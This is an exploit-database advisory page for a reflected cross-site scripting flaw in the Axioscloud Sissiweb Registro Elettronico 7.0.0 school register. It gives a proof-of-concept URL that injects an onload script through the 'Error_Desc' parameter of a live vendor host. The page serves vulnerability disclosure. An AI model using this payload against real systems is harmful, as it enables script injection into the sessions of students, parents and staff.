Axioscloud Sissiweb Registro Elettronico 7.0.0 Cross Site Scripting

2018.10.25

Credit: Dino Barlattani

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
# Dork: n/a
# Date: 2018-10-11
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://axiositalia.it/
# Software Link: http://axiositalia.it/?page_id=1907
# Version: 1.7.0/7.0.0
# Category: Webapps
# Platform: ASPX
# CVE: N/A
# POC:
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Axioscloud Sissiweb Registro Elettronico 7.0.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.